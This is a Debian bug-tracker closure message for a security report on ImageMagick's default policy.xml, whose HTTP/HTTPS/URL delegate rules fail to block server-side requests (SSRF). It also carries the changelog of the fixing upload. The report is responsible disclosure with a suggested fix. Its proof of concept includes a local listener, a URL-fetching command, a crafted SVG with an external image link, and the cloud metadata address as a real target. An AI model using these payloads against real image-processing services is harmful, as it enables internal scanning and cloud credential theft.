Bug#1140176: marked as done (imagemagick: default policy.xml HTTP/HTTPS/URL delegate rules are no-ops (SSRF, CWE-918))

[Debian Bug Tracking System]

Your message dated Sun, 21 Jun 2026 19:17:06 +0000
with message-id <e1wbnfg-00000004r3a-0...@fasolo.debian.org>
and subject line Bug#1140176: fixed in imagemagick 8:7.1.1.43+dfsg1-1+deb13u10
has caused the Debian Bug report #1140176,
regarding imagemagick: default policy.xml HTTP/HTTPS/URL delegate rules are 
no-ops (SSRF, CWE-918)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
1140176: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1140176
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

--- Begin Message ---

Package: imagemagick
Version: 8:7.1.2.15+dfsg1-2
Severity: grave
Tags: security patch

Dear Maintainer,

The default ImageMagick security policy shipped by Debian in
debian/patches/0005-Add-a-debian-policy.patch
(installed as /etc/ImageMagick-7/policy.xml) attempts to block remote
HTTP/HTTPS/URL access -- the standard SSRF mitigation -- with these rules:

  <policy domain="delegate" rights="none" pattern="URL" />
  <policy domain="delegate" rights="none" pattern="HTTPS" />
  <policy domain="delegate" rights="none" pattern="HTTP" />

These rules are silently ineffective, so a default install still performs
outbound HTTP/HTTPS requests and is vulnerable to SSRF (CWE-918).

Root cause
----------
The http:/https: coders fetch URLs by invoking delegates named
"http:decode" / "https:decode" (coders/url.c). InvokeDelegate()
(MagickCore/delegate.c) enforces the "delegate" policy by glob-matching
the policy pattern against that full identifier string. The pattern
"HTTP" (no wildcards) does not match the literal string "http:decode",
so the rule is treated as inapplicable and the default (allow) wins.
The patterns "HTTP", "HTTPS" and "URL" therefore never block the URL
coders.

The "@*" path rule in the same file is enforced through a different code
path and does work, which gives operators false confidence that the
HTTP/HTTPS/URL restriction is also working.

Proof of concept
----------------
All commands run against the unmodified, as-installed policy.xml.

1. Minimal listener:

   python3 -c 'import http.server,socketserver
   class H(http.server.BaseHTTPRequestHandler):
    def do_GET(s): print("SSRF:",s.path); s.send_response(200);
s.end_headers(); s.wfile.write(b"GIF89a;")
    def log_message(s,*a): pass
   socketserver.TCPServer(("127.0.0.1",7777),H).serve_forever()'

2. Confirm the restrictive policy is active (this is correctly blocked):

   echo x > /tmp/q.txt
   magick label:@/tmp/q.txt /tmp/q.png
   -> magick: attempt to perform an operation not allowed by the
      security policy `@/tmp/q.txt'

3. PoC 1 -- direct URL coder:

   magick http://127.0.0.1:7777/ssrf out.png
   -> listener logs: SSRF: /ssrf

4. PoC 2 -- SSRF via untrusted SVG (the realistic web-service vector):

   printf '<svg xmlns:xlink="http://www.w3.org/1999/xlink"; width="10"
height="10"><image xlink:href="http://127.0.0.1:7777/svg-ssrf"; width="10"
height="10"/></svg>' > evil.svg
   magick evil.svg out.png
   -> listener logs: SSRF: /svg-ssrf

Both requests are sent despite the delegate rights="none" rules.
Substituting a real internal target (e.g.
http://169.254.169.254/latest/meta-data/) demonstrates real impact.

Impact
------
A service that thumbnails or converts user-supplied SVG (or URL) input
with ImageMagick can be coerced into attacker-controlled server-side
requests to internal services or cloud metadata endpoints, enabling
credential theft and internal port/host scanning. The exposure is worse
because operators believe they are protected: they deployed a policy
that explicitly lists HTTP, HTTPS and URL as forbidden.

Suggested fix
-------------
Replace the ineffective delegate rules with the coder-domain form, which
is enforced and covers every remote scheme:

  <policy domain="coder" rights="none"
pattern="{HTTP,HTTPS,FTP,FTPS,URL,MSL,MVG}" />

(keeping the existing @* path rule). Verify with:

  magick http://127.0.0.1:1/x x.png

which must be rejected by policy, not merely fail to connect.

Bastien Rouccaries has already prepared a fix; a CVE request is in
progress. I am filing here at the request of the Debian Security Team so
the fix is tracked in the BTS.

Tested on imagemagick 8:7.1.2.15+dfsg1-2; applies generally to the
ImageMagick 7.x series.

Regards,
Maram Sai Harsha Vardhan Reddy
Security Researcher
maramsaiharsh...@gmail.com

--- End Message ---

--- Begin Message ---

Source: imagemagick
Source-Version: 8:7.1.1.43+dfsg1-1+deb13u10
Done: Bastien Roucariès <ro...@debian.org>

We believe that the bug you reported is fixed in the latest version of
imagemagick, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 1140...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Bastien Roucariès <ro...@debian.org> (supplier of updated imagemagick package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Sat, 20 Jun 2026 13:35:39 +0200
Source: imagemagick
Architecture: source
Version: 8:7.1.1.43+dfsg1-1+deb13u10
Distribution: trixie-security
Urgency: high
Maintainer: ImageMagick Packaging Team 
<pkg-gmagick-im-t...@lists.alioth.debian.org>
Changed-By: Bastien Roucariès <ro...@debian.org>
Closes: 1140176
Changes:
 imagemagick (8:7.1.1.43+dfsg1-1+deb13u10) trixie-security; urgency=high
 .
   * Fix CVE-2026-48724:
     When using an image with mask the Floyd-Steinberg dithering
     method it will cause a negative heap buffer over-write
   * Fix CVE-2026-48734:
     A crafted MVG file could result in a stack overflow due to a missing depth
     or visited-set check
   * Fix CVE-2026-48994:
     A missing check of a return value could lead to a heap buffer over-write 
in the MAT
     decoder on 32-bit systems.
   * Fix CVE-2026-49218:
     A missing check in the DCM decoder could result in an image with invalid 
dimensions
     and that could cause crashes in other operation.
   * Fix CVE-2026-49219:
     An incorrect parsing of the filename can result in a policy bypass and 
read files
     disallowed by a security policy using a symlink
   * Backport policy from 7.1.2.25
   * Fix CVE-2026-53460:
     A missing check for maximum memory request in AcquireAlignedMemory
     could trigger an out-of-Memory condition.
   * Fix CVE-2026-53461:
     An incorrect loop in the ICON decoder can result in an out of
     bounds heap write resulting in a crash.
   * Fix CVE-2026-53463:
     When passing incorrect arguments in the distort operation a
     null pointer deference will occur.
   * Fix CVE-2026-53464:
     When providing invalid options to the wand option parser
     a small memory leak will occur.
   * Harden debian policy in case of custom recompilation (Closes: #1140176)
Checksums-Sha1:
 623835326a9e19622ced44bd8b93caf9470fde17 5165 
imagemagick_7.1.1.43+dfsg1-1+deb13u10.dsc
 103af0af388a733c043845b228cf3031c16d859b 10501740 
imagemagick_7.1.1.43+dfsg1.orig.tar.xz
 f0272bcbc3f31e0312f9d104a6d4ecf555485515 346928 
imagemagick_7.1.1.43+dfsg1-1+deb13u10.debian.tar.xz
 dbb9b98836b3b438e7ccd2cbd5d34e0ec5b04cb8 8537 
imagemagick_7.1.1.43+dfsg1-1+deb13u10_source.buildinfo
Checksums-Sha256:
 a3b34ba2a422e93a219195a499ee67b306561f91683d7a77800d83157ed7f10d 5165 
imagemagick_7.1.1.43+dfsg1-1+deb13u10.dsc
 bcb4f3c78a930a608fa4889f889edbcb384974246ad9407fce1858f2c0607bfe 10501740 
imagemagick_7.1.1.43+dfsg1.orig.tar.xz
 8aee9cfdf22414d306fa1b027670f7a4ececc359164e92868b150f21e099d621 346928 
imagemagick_7.1.1.43+dfsg1-1+deb13u10.debian.tar.xz
 f08aa361a89b882d1222aa920d45d1bf124ea073825c941c5f5e1c4786021021 8537 
imagemagick_7.1.1.43+dfsg1-1+deb13u10_source.buildinfo
Files:
 fae1fc22e7e0345b6e7017c9d00b0101 5165 graphics optional 
imagemagick_7.1.1.43+dfsg1-1+deb13u10.dsc
 01cfb13a7c1813afb50790e431358c6c 10501740 graphics optional 
imagemagick_7.1.1.43+dfsg1.orig.tar.xz
 59618f1ae2ed16055eb4d998dc3b7590 346928 graphics optional 
imagemagick_7.1.1.43+dfsg1-1+deb13u10.debian.tar.xz
 3a439d3a552ce5cf68d54a3a98296237 8537 graphics optional 
imagemagick_7.1.1.43+dfsg1-1+deb13u10_source.buildinfo

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEXQGHuUCiRbrXsPVqADoaLapBCF8FAmo3ku8ACgkQADoaLapB
CF9DWQ//UGqtD+gMuatUKmYJXO9gh3He9gef/enbzNWUnCssn0AMkBjVL2wmw9E0
hUa2AIiWicl8qfDxGZiJzI2JiG5uIlX1pwqrXEUMfMXWXbom0ORVq4WN9cVcge2A
ebvVz7pEiD9oeL56Ff6khV6ha9d/Ig0q/mUq8BNwd19I8Gxz517h6eoe0N434e8j
R1SW244+T1FZLiIsxROHL/bfaX2a/ugwT/SNp3yk0d73vSmANtWYoNFASQbMaxHT
NCieZQxF5RueEpCDD08OSAMOhVf496PjLn644JaAduGcoSbIQW3Tslu53xiNAJt5
l6dHvDZ+JTPmER2tbnb8wygE4VDkwsjP0d+/5Wv3oJ7L5n91Eh8rEFPyq+RgDcGh
DTZb/FZPlovtqVq5/uMGdXkyHosgAEefeJeNp5Pi9c0sSM/P1O8QnPsv0fe/sIIB
FHyWdkRjqxTaI0weJ9LzJdEQefg8wbmisqLIdRRCB584IiKajoQOloOmRLzt5/oM
Tod/zO644H9upgbHl+jwsOo61nqKDvrHRAMWxDRwwWIFHORXO+SWpxSDsdI9OJnY
cGGHY/MB7QbuzfWDZqvsh0EXI6HR6wT1RAVo6T3qj497bOA17Hh+QeZPNswgDcGc
G92tnKoA+OxlSItofoefEXPIe3Toj27laCviBDH1TeZcMxyQhN8=
=nqf8
-----END PGP SIGNATURE-----

pgphGA9hNFLqS.pgp
Description: PGP signature

--- End Message ---